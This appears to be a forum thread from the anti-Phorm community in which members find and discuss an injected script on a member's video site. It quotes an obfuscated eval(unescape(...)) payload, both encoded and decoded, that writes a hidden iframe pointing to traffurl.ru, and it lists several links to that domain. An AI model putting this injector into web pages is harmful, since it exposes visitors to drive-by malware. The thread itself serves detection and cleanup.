Virgin Media Phorm Webwise Adverts [Updated: See Post No. 1, 77, 102 & 797]

[CaptJamieHunter]

Support request opened. Seems the FTP and web front end aren't responding so there could be an issue there. Once the access issue is sorted the page will be reloaded onto the ftp server.

[hOrZa]

maybe the Russians know more about the word phorm than we do lol

[vicz]

There is a strange script appended to the page source "<script redacted >eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74% 75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e %74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%2 0%6e%61%6d%65%3d%31%63%61%37%65%66%63%34%61%31%20% 73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%72%61%66 %66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27%2b%4d%6 1%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61% 6e%64%6f%6d%28%29%2a%32%31%35%38%37%37%29%2b%27%37 %31%5c%27%20%77%69%64%74%68%3d%36%38%31%20%68%65%6 9%67%68%74%3d%33%31%37%20%73%74%79%6c%65%3d%5c%27% 64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c %2f%69%66%72%61%6d%65%3e%27%29")); </script> " (the Redacted is my comment!)

Maybe the site has suffered from a drive by server attack http://www.theregister.co.uk/2008/04..._attack_grows/

[Deko]

Guys.

its looks like there is some escaped code at the bottom of the page

is the enescaped script

Quote:

window.status='Done';document.write('<iframe name=1ca7efc4a1 src=\'http://traffurl.ru/sliv?'+Math.round(Math.random()*215877)+'71\' width=681 height=317 style=\'display: none\'></iframe>')

original code.

Quote:

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74 %61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6 d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61% 6d%65%20%6e%61%6d%65%3d%31%63%61%37%65%66%63%34%61 %31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%74%7 2%61%66%66%75%72%6c%2e%72%75%2f%73%6c%69%76%3f%27% 2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e %72%61%6e%64%6f%6d%28%29%2a%32%31%35%38%37%37%29%2 b%27%37%31%5c%27%20%77%69%64%74%68%3d%36%38%31%20% 68%65%69%67%68%74%3d%33%31%37%20%73%74%79%6c%65%3d %5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%2 7%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

But it also trying to run "Microsoft Data Access - Remote Data services" control


So maybe that site is trying to load some nasties.

[vicz]

My Safari Activity Window shows this link "traffurl.ru/sliv/?5776271" Googling the domain gets a 'This site may harm your computer' message. So looks like Kapersky is correct

[Pasanonic]

With regard to the captains video site I am seeing no problems with Norton or Spybot resident. However there are two concerning frames appearing when I check it out with adblock.

http://traffurl.ru/sliv?4193771

this is one but the other ( also linked to an index.php at the russian URL ) seems to have disappeared as I've just done a system restart.

Edit. The offending article seems to be your hit counter

[vicz]

I mean we all know .ru is Russia right? I mean its not just me being paranoid....

[jelv]

Kent's friends starting a counter attack on anti-Phorm sites?

[Chroma]

Quote:

Originally Posted by jelv

Kent's friends starting a counter attack on anti-Phorm sites?

counter attack suggests we attacked first

[Paddy1]

When I refreshed this (forum) page just now AVG came up with a threat alert saying virus HTML/framer detected. It couldn't "heal" the page and I could only vault it. I'm posting this from another pc.

[Ravenheart]

Addblock and No Script are blocking the links to

http://traffurl.ru/sliv?19907971



Hmm, tis suspicious

[Pasanonic]

Quote:

Originally Posted by Ravenheart

Addblock and No Script are blocking the links to

http://traffurl.ru/sliv?19907971



Hmm, tis suspicious

This discussion might add some more information.

http://www.developersdex.com/asp/mes...2978&r=6157380

[CaptJamieHunter]

The code for the hit counter doesn't have anything to do with .ru domains - just a cgi script passing display parameters. No .ru anywhere.

The call has been updated and as soon as the response says access is available then it will be sorted.

[Pasanonic]

Quote:

Originally Posted by CaptJamieHunter

The code for the hit counter doesn't have anything to do with .ru domains - just a cgi script passing display parameters. No .ru anywhere.

The call has been updated and as soon as the response says access is available then it will be sorted.

Sorry you are correct. The reason I thought it was that because I asked adblock to flash the offending frame and it appeared around your hit counter. It would appear an invisible frame is being used to upload a trojan from the Russian server.
At least you should remove the script from the page.

[CaptJamieHunter]

Quote:

Originally Posted by Pasanonic

Sorry you are correct. The reason I thought it was that because I asked adblock to flash the offending frame and it appeared around your hit counter. It would appear an invisible frame is being used to upload a trojan from the Russian server.
At least you should remove the script from the page.

When I can get to it I will.